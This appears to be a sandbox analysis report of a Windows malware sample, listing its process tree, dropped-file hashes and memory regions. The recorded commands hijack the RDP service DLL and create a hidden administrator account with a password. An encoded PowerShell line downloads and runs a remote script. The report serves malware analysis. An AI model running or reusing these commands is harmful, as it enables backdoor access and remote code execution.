C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc qOgyLOeJ /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc qOgyLOeJ /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc qOgyLOeJ /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MHKKHUYI$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc qOgyLOeJ1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc qOgyLOeJ2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc qOgyLOeJ3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2556.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
SHA512f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
-
C:\Users\Admin\AppData\Local\Temp\2556.exeMD5
77ce7ab11225c5e723b7b1be0308e8c0
SHA1709a8df1d49f28cf8c293694bbbbd0f07735829b
SHA256d407b5c7d9568448f1e7387924fe4dded9e016632879c386c307ef5dcf63f496
SHA512f73582206397db625bdefbbaf8abdc1a820ae8054eb2ef2a3ed18c8e00e8365c7ad81013b33990e4304619b3834a1b8b15c782905204add158fca686e2c25c3b
-
C:\Users\Admin\AppData\Local\Temp\2B53.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\2B53.exeMD5
3ba1d635fed88d8af279be91b7007bae
SHA162a1d59c746cdb51e699114f410749384a70cf73
SHA2563151b115c3370d5360286bfe3a053d0d543f0e5d21faa68fee167224e68d115a
SHA51283254fb484bd40740e5e0483dcc7fd8ce612033b00238494fdcdc5a5dcb3503195e0e2694edd5d848c07e2ddc61cafdb7d331afc4792ccd788837ebbce18bfeb
-
C:\Users\Admin\AppData\Local\Temp\3372.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\3372.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeMD5
fd4e0205ce36f99ff343a78ec3e251bc
SHA1b633df31339acb69f708a41fd227298420fd4036
SHA256617f9d822418a44cac50b28755f2d075fac1c2de21995820912f07f4b4ee8075
SHA512f413a054603bc0bc86d1657e3960c4b691e7900be36e9470a408264cb63ad0eb9d7cea7b83dbfdf7f727ea5c359d7d6ab5b565ab60976735d67f00c5a082f50e
-
C:\Users\Admin\AppData\Local\Temp\5BCC.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\5BCC.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\RES8818.tmpMD5
d2a72aa9256b7d29c36e9b6104a463bb
SHA1ad9f38948f0813f921db83ed6aed2dc5358431e1
SHA2565c494c453cf9ecc068a26771e376fb4b012592046eedba67b1681a2d7e28c363
SHA512badde297a02b050c3ba1ecd455716eda2c86c07e5bef25b54c898a08cbe87f56a762e6278d00647a10a19afdbe56f49665c60b2f785bf1bd29c92360b7956b34
-
C:\Users\Admin\AppData\Local\Temp\RES9084.tmpMD5
c6363291e00109b7499524ba9f840618
SHA1c84aee07f8127e5305b307b5ff4562c922e66b45
SHA256cb6d19b67bbbdfd31a9a4e44dfd9ed8f7a379a962ebe93a17c2c0f438e27f233
SHA51267e0b497c3e05c39d829c9493dbff69942e5aaea273268373031f5594ad4f7bf0b01e6805206654333244d92332bec4668c626ffea3d0911fc4f660a0ec4ade1
-
C:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.dllMD5
e96fd91ba2ddf7f52899ee1b6967df57
SHA16f2c29791fdaba092a40c0e23c766aa6893e96c6
SHA256f7587e403e415c5b15b950c786b7993f34f6c40a3f23cd897182a0e2159151b8
SHA51253d2451b965b55c44d000624869a42b2dad1ff3c91df247255977b73149e38588fc81cf9332cddc09f3ba6ca8eaca625fb122f391e4c992b0d41d82ee6884136
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
854b2dfc0a28f2959b1d2fc363a4e318
SHA1ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA2567135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.dllMD5
3f4488d20d9150f62f956cae3371c0e7
SHA114b7e3e1b1b1bb3b441d7a31d92cf33548527174
SHA256db658965583b0af5fc88890c8f5da2007c3861ca178b4309624319354086f4bf
SHA5126c7c97b519bed7be2a1d1d02226427afde6c144c813967c83a0de778df5109ea41642465851eaf721cf10a44bef0ece485c7a8b8cb7aa9a3f3f64f2c4bd8c40b
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\auuewjeMD5
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
SHA1e5d892d8c416d2768f12e7f45c8588a0c98f5987
SHA25674e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
SHA512041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
-
C:\Users\Admin\AppData\Roaming\auuewjeMD5
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
SHA1e5d892d8c416d2768f12e7f45c8588a0c98f5987
SHA25674e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
SHA512041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
-
\??\c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\CSC274793B17BA34147AA1A9E992D21413.TMPMD5
1a307ec9434b6cdb615a8c44d95830bb
SHA1c6ba1319d5d4a3aea012ebecb4e01eda7f48b6c2
SHA256883b74d855f854d12e7f1b1b2722ac97b1a37fd5a7369b562d5f829403415477
SHA5123b15f278bd92627137b43bf906f43b22b2ccf68445adbde5a43b215c94a360783bde90a0cd73b5641539b47dd3e826c05362cff0565b138bc7b9093125246556
-
\??\c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.cmdlineMD5
9066e90e7b07733bf2b90fafa3e6dc20
SHA1ca67ba3056a9785cb69fbd5463322d05b96203ff
SHA2566e4aec9ad1ee1a184ae9ba07c6071d8e7b6211c49bc623ed0f91d3e1f629fbf7
SHA512bb70e9ffc605aefee61c70f5dedc46ba62e1b0d3f314c0e85158ec0dd7131c2bf5464f00cd5ecd5427e0a7a1727869b4b49550b899e672c06cc858a1dffb4407
-
\??\c:\Users\Admin\AppData\Local\Temp\hlytvvhu\CSCD325231E0BC419885828D16AAB4B2A2.TMPMD5
5a84705cde9b68063345354a07d684ae
SHA1072fd6ad42784ebaddaa9b568f12d416d4210282
SHA2569a79ff3e759f4207a73ca508a55e0ed26e69afccaccedc0e42cd46b60d712b36
SHA512af5197a561bb2f1853999f70706cf099dbf7ec0dfdd89bd7d8da149cc4441388911671936aca458d9094ce40dda3779d247c00a9255d21306b4217d8c0f95351
-
\??\c:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.cmdlineMD5
8175c2982e5f3bf67becc746d024496c
SHA1f3ff01147ae565290b308d4f4429fe64051af01b
SHA2563025961100b3ee59e454aae52be5f76ed145ebe1c4e599fcbedafd6cc19158eb
SHA512e10bc60315161abc0d9bfe112964f6bb12af7eab40bf43c392b526db41d83bc6921178ef492b08dbed02fdb1898ce0eac655726d45a59fbf46575888e24f2439
-
\Windows\Branding\mediasrv.pngMD5
83bd2c45f1faf20a77579cbb8765c2b3
SHA1fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.pngMD5
af4e893deae35128088534aea49a1b74
SHA1ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA25676dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA5123115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
-
memory/8-487-0x0000000000000000-mapping.dmp
-
memory/356-423-0x0000000000000000-mapping.dmp
-
memory/392-476-0x0000000000000000-mapping.dmp
-
memory/704-490-0x0000000000000000-mapping.dmp
-
memory/808-132-0x0000000004EA0000-0x0000000004EA1000-memory.dmpFilesize
4KB
-
memory/808-173-0x0000000005050000-0x0000000005051000-memory.dmpFilesize
4KB
-
memory/808-146-0x000000006FC50000-0x000000006FC9B000-memory.dmpFilesize
300KB
-
memory/808-135-0x0000000074A50000-0x0000000075D98000-memory.dmpFilesize
19.3MB
-
memory/808-122-0x0000000000C60000-0x0000000000CC8000-memory.dmpFilesize
416KB
-
memory/808-125-0x0000000073A80000-0x0000000073C42000-memory.dmpFilesize
1.8MB
-
memory/808-123-0x00000000006B0000-0x00000000006B1000-memory.dmpFilesize
4KB
-
memory/808-136-0x0000000004E90000-0x0000000004E91000-memory.dmpFilesize
4KB
-
memory/808-134-0x0000000073C60000-0x00000000741E4000-memory.dmpFilesize
5.5MB
-
memory/808-133-0x0000000004D20000-0x0000000004D21000-memory.dmpFilesize
4KB
-
memory/808-145-0x0000000004D60000-0x0000000004D61000-memory.dmpFilesize
4KB
-
memory/808-119-0x0000000000000000-mapping.dmp
-
memory/808-126-0x0000000076CD0000-0x0000000076DC1000-memory.dmpFilesize
964KB
-
memory/808-124-0x0000000002260000-0x00000000022A5000-memory.dmpFilesize
276KB
-
memory/808-131-0x0000000004CC0000-0x0000000004CC1000-memory.dmpFilesize
4KB
-
memory/808-127-0x0000000000C60000-0x0000000000C61000-memory.dmpFilesize
4KB
-
memory/808-129-0x0000000071AA0000-0x0000000071B20000-memory.dmpFilesize
512KB
-
memory/808-130-0x00000000054B0000-0x00000000054B1000-memory.dmpFilesize
4KB
-
memory/808-183-0x00000000068D0000-0x00000000068D1000-memory.dmpFilesize
4KB
-
memory/808-184-0x0000000006FD0000-0x0000000006FD1000-memory.dmpFilesize
4KB
-
memory/1064-282-0x00000224818C3000-0x00000224818C5000-memory.dmpFilesize
8KB
-
memory/1064-303-0x00000224818C6000-0x00000224818C8000-memory.dmpFilesize
8KB
-
memory/1064-269-0x0000000000000000-mapping.dmp
-
memory/1064-323-0x00000224818C8000-0x00000224818CA000-memory.dmpFilesize
8KB
-
memory/1064-281-0x00000224818C0000-0x00000224818C2000-memory.dmpFilesize
8KB
-
memory/1156-477-0x0000000000000000-mapping.dmp
-
memory/1300-406-0x000001E4FD6D8000-0x000001E4FD6DA000-memory.dmpFilesize
8KB
-
memory/1300-404-0x000001E4FD6D3000-0x000001E4FD6D5000-memory.dmpFilesize
8KB
-
memory/1300-405-0x000001E4FD6D6000-0x000001E4FD6D8000-memory.dmpFilesize
8KB
-
memory/1300-403-0x000001E4FD6D0000-0x000001E4FD6D2000-memory.dmpFilesize
8KB
-
memory/1300-359-0x0000000000000000-mapping.dmp
-
memory/1308-170-0x0000000000000000-mapping.dmp
-
memory/1308-194-0x0000000002EB0000-0x0000000002EB6000-memory.dmpFilesize
24KB
-
memory/1308-199-0x0000000000400000-0x0000000002B74000-memory.dmpFilesize
39.5MB
-
memory/1308-195-0x0000000002EC0000-0x0000000002EC5000-memory.dmpFilesize
20KB
-
memory/1320-478-0x0000000000000000-mapping.dmp
-
memory/1352-424-0x0000000000000000-mapping.dmp
-
memory/1476-480-0x0000000000000000-mapping.dmp
-
memory/1504-486-0x0000000000000000-mapping.dmp
-
memory/1564-485-0x0000000000000000-mapping.dmp
-
memory/1684-472-0x0000000000000000-mapping.dmp
-
memory/1724-164-0x0000000073C60000-0x00000000741E4000-memory.dmpFilesize
5.5MB
-
memory/1724-150-0x0000000000000000-mapping.dmp
-
memory/1724-153-0x0000000000AC0000-0x0000000000B2C000-memory.dmpFilesize
432KB
-
memory/1724-154-0x00000000005E0000-0x00000000005E1000-memory.dmpFilesize
4KB
-
memory/1724-155-0x0000000073A80000-0x0000000073C42000-memory.dmpFilesize
1.8MB
-
memory/1724-156-0x0000000076CD0000-0x0000000076DC1000-memory.dmpFilesize
964KB
-
memory/1724-157-0x0000000000AC0000-0x0000000000AC1000-memory.dmpFilesize
4KB
-
memory/1724-159-0x0000000071AA0000-0x0000000071B20000-memory.dmpFilesize
512KB
-
memory/1724-166-0x0000000000CC0000-0x0000000000D05000-memory.dmpFilesize
276KB
-
memory/1724-165-0x0000000074A50000-0x0000000075D98000-memory.dmpFilesize
19.3MB
-
memory/1724-167-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/1724-169-0x000000006FC50000-0x000000006FC9B000-memory.dmpFilesize
300KB
-
memory/1736-586-0x0000000000000000-mapping.dmp
-
memory/1736-248-0x0000000000000000-mapping.dmp
-
memory/1752-491-0x0000000000000000-mapping.dmp
-
memory/1752-509-0x000001EE70370000-0x000001EE70372000-memory.dmpFilesize
8KB
-
memory/1752-510-0x000001EE70373000-0x000001EE70375000-memory.dmpFilesize
8KB
-
memory/1752-511-0x000001EE70376000-0x000001EE70378000-memory.dmpFilesize
8KB
-
memory/1752-521-0x000001EE70378000-0x000001EE70379000-memory.dmpFilesize
4KB
-
memory/1868-482-0x0000000000000000-mapping.dmp
-
memory/2108-267-0x000001BCAFB08000-0x000001BCAFB09000-memory.dmpFilesize
4KB
-
memory/2108-215-0x000001BC97470000-0x000001BC97472000-memory.dmpFilesize
8KB
-
memory/2108-212-0x0000000000000000-mapping.dmp
-
memory/2108-216-0x000001BC97470000-0x000001BC97472000-memory.dmpFilesize
8KB
-
memory/2108-233-0x000001BCAFB06000-0x000001BCAFB08000-memory.dmpFilesize
8KB
-
memory/2108-225-0x000001BCAFB03000-0x000001BCAFB05000-memory.dmpFilesize
8KB
-
memory/2108-224-0x000001BCAFB00000-0x000001BCAFB02000-memory.dmpFilesize
8KB
-
memory/2108-213-0x000001BC97470000-0x000001BC97472000-memory.dmpFilesize
8KB
-
memory/2108-214-0x000001BC97470000-0x000001BC97472000-memory.dmpFilesize
8KB
-
memory/2368-236-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/2472-468-0x0000000000000000-mapping.dmp
-
memory/2700-585-0x0000000000000000-mapping.dmp
-
memory/2708-462-0x0000000000000000-mapping.dmp
-
memory/2820-245-0x0000000000000000-mapping.dmp
-
memory/2980-203-0x000002206ED80000-0x000002206F04F000-memory.dmpFilesize
2.8MB
-
memory/2980-207-0x000002206CA95000-0x000002206CA96000-memory.dmpFilesize
4KB
-
memory/2980-206-0x000002206CA93000-0x000002206CA95000-memory.dmpFilesize
8KB
-
memory/2980-200-0x0000000000000000-mapping.dmp
-
memory/2980-208-0x000002206CA96000-0x000002206CA97000-memory.dmpFilesize
4KB
-
memory/2980-205-0x000002206CA90000-0x000002206CA92000-memory.dmpFilesize
8KB
-
memory/2996-362-0x000001842DD38000-0x000001842DD3A000-memory.dmpFilesize
8KB
-
memory/2996-324-0x000001842DD30000-0x000001842DD32000-memory.dmpFilesize
8KB
-
memory/2996-325-0x000001842DD33000-0x000001842DD35000-memory.dmpFilesize
8KB
-
memory/2996-313-0x0000000000000000-mapping.dmp
-
memory/2996-360-0x000001842DD36000-0x000001842DD38000-memory.dmpFilesize
8KB
-
memory/3040-118-0x00000000009B0000-0x00000000009C6000-memory.dmpFilesize
88KB
-
memory/3040-266-0x00000000045E0000-0x00000000045F6000-memory.dmpFilesize
88KB
-
memory/3160-422-0x0000000000000000-mapping.dmp
-
memory/3232-467-0x0000000000000000-mapping.dmp
-
memory/3312-483-0x0000000000000000-mapping.dmp
-
memory/3388-484-0x0000000000000000-mapping.dmp
-
memory/3504-117-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/3504-116-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/3608-470-0x0000000000000000-mapping.dmp
-
memory/3612-469-0x0000000000000000-mapping.dmp
-
memory/3704-466-0x0000000000000000-mapping.dmp
-
memory/3704-239-0x0000000000000000-mapping.dmp
-
memory/3844-488-0x0000000000000000-mapping.dmp
-
memory/3844-461-0x0000000000000000-mapping.dmp
-
memory/3848-235-0x0000000000000000-mapping.dmp
-
memory/3848-471-0x0000000000000000-mapping.dmp
-
memory/3852-479-0x0000000000000000-mapping.dmp
-
memory/3868-481-0x0000000000000000-mapping.dmp
-
memory/3960-211-0x0000000000400000-0x0000000002B74000-memory.dmpFilesize
39.5MB
-
memory/3960-209-0x0000000002B80000-0x0000000002CCA000-memory.dmpFilesize
1.3MB
-
memory/3960-210-0x0000000002B80000-0x0000000002CCA000-memory.dmpFilesize
1.3MB
-
memory/3972-473-0x0000000000000000-mapping.dmp
-
memory/3976-137-0x0000000000000000-mapping.dmp
-
memory/3976-140-0x0000000000470000-0x0000000000471000-memory.dmpFilesize
4KB
-
memory/3976-149-0x0000000004C70000-0x0000000005276000-memory.dmpFilesize
6.0MB
-
memory/3976-174-0x0000000005030000-0x0000000005031000-memory.dmpFilesize
4KB
-
memory/3976-175-0x0000000005150000-0x0000000005151000-memory.dmpFilesize
4KB
-
memory/3976-176-0x0000000005D90000-0x0000000005D91000-memory.dmpFilesize
4KB
-
memory/3976-177-0x0000000005130000-0x0000000005131000-memory.dmpFilesize
4KB
-
memory/3996-489-0x0000000000000000-mapping.dmp